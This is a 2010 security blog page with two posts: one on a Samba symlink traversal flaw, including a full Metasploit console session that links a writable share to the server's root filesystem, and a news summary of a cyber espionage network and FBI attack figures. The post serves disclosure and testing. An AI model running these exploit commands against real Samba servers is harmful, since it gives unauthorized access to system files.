Posted by: Charlie Clark
in General security on 02, 08, 2010
Tagged in: Untagged
Last night, Kingcope uploaded a video to youtube demonstrating a logic flaw in the Samba CIFS service (this was followed by a mailing list post). This bug allows any user with write access to a file share to create a symbolic link to the root filesystem. From this link, the user can access any file on the system with their current privileges. This affects any Samba service that allows anonymous write access, however read access to the filesystem is limited by normal user-level privileges. In most cases, anonymous users are limited to the 'nobody' account, limiting the damage possible through this exploit.
A Metasploit auxiliary module has been added to verify and test this vulnerability. Update to SVN revision 8369 or newer and start up the Metasploit Console:
$ msfconsole
msf > use auxiliary/admin/smb/samba_symlink_traversal
msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.0.2
msf auxiliary(samba_symlink_traversal) > set SMBSHARE shared
msf auxiliary(samba_symlink_traversal) > set SMBTARGET rooted
msf auxiliary(samba_symlink_traversal) > run
[*] Connecting to the server...
[*] Trying to mount writeable share 'shared'...
[*] Trying to link 'rooted' to the root filesystem...
[*] Now access the following share to browse the root filesystem:
[*] 192.168.0.2shared
ooted
Keep in mind that non-anonymous shares can be used as well, just enter SMBUser and SMBPass for a valid user account.
Posted by: Charlie Clark
in General security on 02, 03, 2010
Tagged in: Untagged
The Department of Foreign Affairs (DFA) was attacked by a cyber spy network.
DFA officials admitted that it was taking these reports seriously. The cyber attack on DFA was reported by the Toronto based Information Welfare Monitor.
The Philippines is one of the 103 countries where classified documents from government and private organizations, including the computers of the Dalai Lama and Tibetan exiles, have been hacked into, said IWM.
IWM is composed of researchers from Ottawa-based think tank SecDev Group and University of Toronto’s Munk Center for International Studies.
The Canadian researchers detected a cyber espionage network involving more than 1,295 compromised computers from the ministries of foreign affairs of the Philippines, Iran, Bangladesh, Latvia, Indonesia, Brunei, Barbados and Bhutan.
The researchers also discovered hacked systems in the embassies of India, South Korea, Indonesia, Romania, Cyprus, Malta, Thailand, Taiwan, Portugal, Germany and Pakistan.
The USA is also being attacked. And these attacks are proliferating, according to a Federal Bureau of Investigation (FBI) report.
The FBI report lays out the identifiable attacks originating from China just on the Defense Department computers; they increased from 44,000 in 2007 to 55,000 in 2008, and topped 90,000 last year.
The Chinese hackers are not after credit card numbers or bank accounts or looking to steal private identities. They are hunting for information.
Although the barrage of attacks may at times appear random, the FBI report concludes that it is part of a strategy to fully flush out US military telecommunications and to better understand—and to attempt to intercept—intelligence being gathered by American spy agencies, particularly the National Security Agency.
Community Blogs
